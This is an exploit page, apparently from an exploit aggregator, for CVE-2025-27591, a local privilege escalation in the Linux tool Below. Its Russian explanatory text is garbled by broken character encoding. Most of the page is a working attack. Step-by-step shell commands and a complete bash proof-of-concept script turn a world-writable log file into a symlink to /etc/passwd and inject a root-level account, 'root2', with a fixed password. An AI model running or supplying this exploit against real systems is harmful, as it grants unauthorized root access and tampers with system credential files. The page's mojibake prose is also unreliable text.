## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-VISAICYBER-CVE-2025-27591-BELOW-
# CVE-2025-27591 β ΠΠΎΠ²ΡΡΠ΅Π½ΠΈΠ΅ ΠΏΡΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ Π² Below
## 1) ΠΠ²Π΅Π΄Π΅Π½ΠΈΠ΅
Below β ΡΡΠΎ ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½Ρ Linux Π΄Π»Ρ Π·Π°ΠΏΠΈΡΠΈ ΠΈ ΠΎΡΠΎΠ±ΡΠ°ΠΆΠ΅Π½ΠΈΡ ΡΠΈΡΡΠ΅ΠΌΠ½ΡΡ
Π΄Π°Π½Π½ΡΡ
, ΡΠ°ΠΊΠΈΡ
ΠΊΠ°ΠΊ ΠΈΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°Π½ΠΈΠ΅ Π°ΠΏΠΏΠ°ΡΠ°ΡΠ½ΡΡ
ΡΡΠ΅Π΄ΡΡΠ² ΠΈ ΠΌΠ΅ΡΡΠΈΠΊΠΈ cgroup.
Π Π²Π΅ΡΡΠΈΡΡ
Π΄ΠΎ **v0.9.0** systemd-ΡΠ΅ΡΠ²ΠΈΡ Below Π·Π°ΠΏΡΡΠΊΠ°Π΅ΡΡΡ Ρ ΠΏΡΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΡΠΌΠΈ `root` ΠΈ ΡΠΎΠ·Π΄Π°ΡΡ ΠΎΠ±ΡΠ΅Π΄ΠΎΡΡΡΠΏΠ½ΡΠ΅ Π΄Π»Ρ Π·Π°ΠΏΠΈΡΠΈ ΠΊΠ°ΡΠ°Π»ΠΎΠ³ΠΈ ΠΈ ΡΠ°ΠΉΠ»Ρ Π»ΠΎΠ³ΠΎΠ² Π² `/var/log/below`. ΠΡΠ° Π½Π΅Π±Π΅Π·ΠΎΠΏΠ°ΡΠ½Π°Ρ ΠΊΠΎΠ½ΡΠΈΠ³ΡΡΠ°ΡΠΈΡ ΠΏΠΎΠ·Π²ΠΎΠ»ΡΠ΅Ρ ΠΎΡΡΡΠ΅ΡΡΠ²Π»ΡΡΡ **Π°ΡΠ°ΠΊΠΈ ΡΠ΅ΡΠ΅Π· ΡΠΈΠΌΠ»ΠΈΠ½ΠΊΠΈ** , ΠΊΠΎΡΠΎΡΡΠ΅ Π΄Π°ΡΡ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡΡ Π½Π΅ΠΏΡΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΡΠΎΠ²Π°Π½Π½ΠΎΠΌΡ Π»ΠΎΠΊΠ°Π»ΡΠ½ΠΎΠΌΡ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ ΠΏΠΎΠ²ΡΡΠΈΡΡ ΡΠ²ΠΎΠΈ ΠΏΡΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΈ Π΄ΠΎ `root`.
ΠΡΠΎΠΉ ΠΏΡΠΎΠ±Π»Π΅ΠΌΠ΅ ΠΏΡΠΈΡΠ²ΠΎΠ΅Π½ **CVE-2025-27591**.
Π Π°Π·ΡΠ°Π±ΠΎΡΡΠΈΠΊΠΈ ΠΈΡΠΏΡΠ°Π²ΠΈΠ»ΠΈ Π΅Ρ Π² Π²Π΅ΡΡΠΈΠΈ **v0.9.0**.
* * *
## 2) Π£ΡΠ·Π²ΠΈΠΌΠΎΡΡΡ β ΠΡΠ°ΠΊΠ° ΡΠ΅ΡΠ΅Π· ΡΠΈΠΌΠ»ΠΈΠ½ΠΊ Π² `/var/log/below`
* Below Π³Π°ΡΠ°Π½ΡΠΈΡΡΠ΅Ρ, ΡΡΠΎ `/var/log/below` ΠΈΠΌΠ΅Π΅Ρ ΠΏΡΠ°Π²Π° **0777** Π²ΠΎ Π²ΡΠ΅ΠΌΡ Π²ΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΡ.
* ΠΠ½ ΡΠ°ΠΊΠΆΠ΅ ΡΠΎΠ·Π΄Π°ΡΡ `/var/log/below/error_root.log` Ρ ΠΏΡΠ°Π²Π°ΠΌΠΈ **0666**.
* ΠΠΎΡΠΊΠΎΠ»ΡΠΊΡ ΠΊΠ°ΡΠ°Π»ΠΎΠ³ Π΄ΠΎΡΡΡΠΏΠ΅Π½ Π΄Π»Ρ Π·Π°ΠΏΠΈΡΠΈ Π²ΡΠ΅ΠΌ, Π·Π»ΠΎΡΠΌΡΡΠ»Π΅Π½Π½ΠΈΠΊ ΠΌΠΎΠΆΠ΅Ρ **Π·Π°ΠΌΠ΅Π½ΠΈΡΡ ΡΠ°ΠΉΠ» Π»ΠΎΠ³Π° ΡΠΈΠΌΠ»ΠΈΠ½ΠΊΠΎΠΌ** Π½Π° Π»ΡΠ±ΠΎΠΉ ΡΡΠ²ΡΡΠ²ΠΈΡΠ΅Π»ΡΠ½ΡΠΉ ΡΠ°ΠΉΠ» (Π½Π°ΠΏΡΠΈΠΌΠ΅Ρ, `/etc/passwd`).
* ΠΠΎΠ³Π΄Π° Below Π·Π°ΠΏΠΈΡΡΠ²Π°Π΅Ρ Π»ΠΎΠ³ΠΈ ΠΎΡ ΠΈΠΌΠ΅Π½ΠΈ root, ΠΎΠ½ Π²ΠΌΠ΅ΡΡΠΎ ΡΡΠΎΠ³ΠΎ Π±ΡΠ΄Π΅Ρ ΠΏΠΈΡΠ°ΡΡ Π² ΡΠ΅Π»Ρ ΡΠΈΠΌΠ»ΠΈΠ½ΠΊΠ°, ΡΡΠΎ ΠΏΠΎΠ·Π²ΠΎΠ»ΡΠ΅Ρ ΠΏΠΎΠ²ΡΡΠΈΡΡ ΠΏΡΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΈ.
Π’Π°ΠΊΠΎΠ΅ ΠΏΠΎΠ²Π΅Π΄Π΅Π½ΠΈΠ΅ ΠΎΠ±Ρ
ΠΎΠ΄ΠΈΡ Π·Π°ΡΠΈΡΡ ΡΠ΄ΡΠ° `protected_symlinks`, ΠΏΠΎΡΠΊΠΎΠ»ΡΠΊΡ Π½Π΅ ΠΏΡΠΈΠΌΠ΅Π½ΡΠ΅ΡΡΡ sticky-Π±ΠΈΡ.
* * *
## 3) ΠΠΊΡΠΏΠ»ΡΠ°ΡΠ°ΡΠΈΡ
ΠΠ°ΠΏΡΠ°Π²ΠΈΠ² `error_root.log` Π½Π° `/etc/passwd`, ΠΌΡ ΠΌΠΎΠΆΠ΅ΠΌ Π²Π½Π΅Π΄ΡΠΈΡΡ Π½ΠΎΠ²ΠΎΠ³ΠΎ root-ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ Ρ ΠΈΠ·Π²Π΅ΡΡΠ½ΡΠΌ ΠΏΠ°ΡΠΎΠ»Π΅ΠΌ.
### Π¨Π°Π³ΠΈ
Π¨Π°Π³ 1: Π‘ΠΎΠ·Π΄Π°ΠΉΡΠ΅ ΡΠ΅Π·Π΅ΡΠ²Π½ΡΡ ΠΊΠΎΠΏΠΈΡ `/etc/passwd`. ΠΡΠ΅Π³Π΄Π° Π΄Π΅Π»Π°ΠΉΡΠ΅ ΡΠ΅Π·Π΅ΡΠ²Π½ΡΡ ΠΊΠΎΠΏΠΈΡ ΠΏΠ΅ΡΠ΅Π΄ ΠΈΠ·ΠΌΠ΅Π½Π΅Π½ΠΈΠ΅ΠΌ ΡΠΈΡΡΠ΅ΠΌΠ½ΡΡ
ΡΠ°ΠΉΠ»ΠΎΠ²:
root@kitploit:~
cp /etc/passwd /tmp/passwd.bak
Π¨Π°Π³ 2: Π‘Π³Π΅Π½Π΅ΡΠΈΡΡΠΉΡΠ΅ Π²ΡΠ΅Π΄ΠΎΠ½ΠΎΡΠ½ΡΡ Π·Π°ΠΏΠΈΡΡ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ
root@kitploit:~
HASH=$(openssl passwd -6 'rooted123')
echo "root2:$HASH:0:0:root:/root:/bin/bash" > /tmp/payload
Π¨Π°Π³ 3: Π‘ΠΎΠ·Π΄Π°ΠΉΡΠ΅ ΡΠΈΠΌΠ»ΠΈΠ½ΠΊ Π½Π° ΡΡΠ·Π²ΠΈΠΌΡΠΉ Π»ΠΎΠ³
root@kitploit:~
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
Π¨Π°Π³ 4: ΠΠ½ΠΈΡΠΈΠΈΡΡΠΉΡΠ΅ ΡΠΎΠ·Π΄Π°Π½ΠΈΠ΅ Π»ΠΎΠ³Π°
root@kitploit:~
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1
Π¨Π°Π³ 5: ΠΠ΅ΡΠ΅Π·Π°ΠΏΠΈΡΠΈΡΠ΅ `/etc/passwd`
root@kitploit:~
cat /tmp/payload > /var/log/below/error_root.log
Π¨Π°Π³ 6: ΠΠ΅ΡΠ΅ΠΊΠ»ΡΡΠΈΡΠ΅ΡΡ Π½Π° Π½ΠΎΠ²ΠΎΠ³ΠΎ root-ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ
root@kitploit:~
su root2
# password: rooted123
* * *
## 4) ΠΠΎΠΊΠ°Π·Π°ΡΠ΅Π»ΡΡΡΠ²ΠΎ ΠΊΠΎΠ½ΡΠ΅ΠΏΡΠΈΠΈ (PoC): ΠΠ°ΠΏΡΡΡΠΈΡΠ΅ ΡΡΠΎΡ ΡΠΊΡΠΈΠΏΡ
root@kitploit:~
#!/bin/bash
# CVE-2025-27591 Exploit - Privilege Escalation via 'below'
TARGET="/etc/passwd"
LINK_PATH="/var/log/below/error_root.log"
TMP_PAYLOAD="/tmp/payload"
BACKUP="/tmp/passwd.bak"
echo "[*] CVE-2025-27591 Privilege Escalation Exploit"
# Check for sudo access to below
echo "[*] Checking sudo permissions..."
if ! sudo -l | grep -q '/usr/bin/below'; then
echo "[!] 'below' is not available via sudo. Exiting."
exit 1
fi
# Backup current /etc/passwd
echo "[*] Backing up /etc/passwd to $BACKUP"
cp /etc/passwd "$BACKUP"
# Generate password hash for 'root2' user (password: rooted123)
echo "[*] Generating password hash..."
HASH=$(openssl passwd -6 'rooted123')
# Prepare malicious passwd line
echo "[*] Creating malicious passwd line..."
echo "root2:$HASH:0:0:root:/root:/bin/bash" > "$TMP_PAYLOAD"
# Create symlink
echo "[*] Linking $LINK_PATH to $TARGET"
rm -f "$LINK_PATH"
ln -sf "$TARGET" "$LINK_PATH"
# Trigger log creation with invalid --time to force below to recreate the log
echo "[*] Triggering 'below' to write to symlinked log..."
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1
# Overwrite passwd file via symlink
echo "[*] Injecting malicious user into /etc/passwd"
cat "$TMP_PAYLOAD" > "$LINK_PATH"
# Test access
echo "[*] Try switching to 'root2' using password: rooted123"
su root2
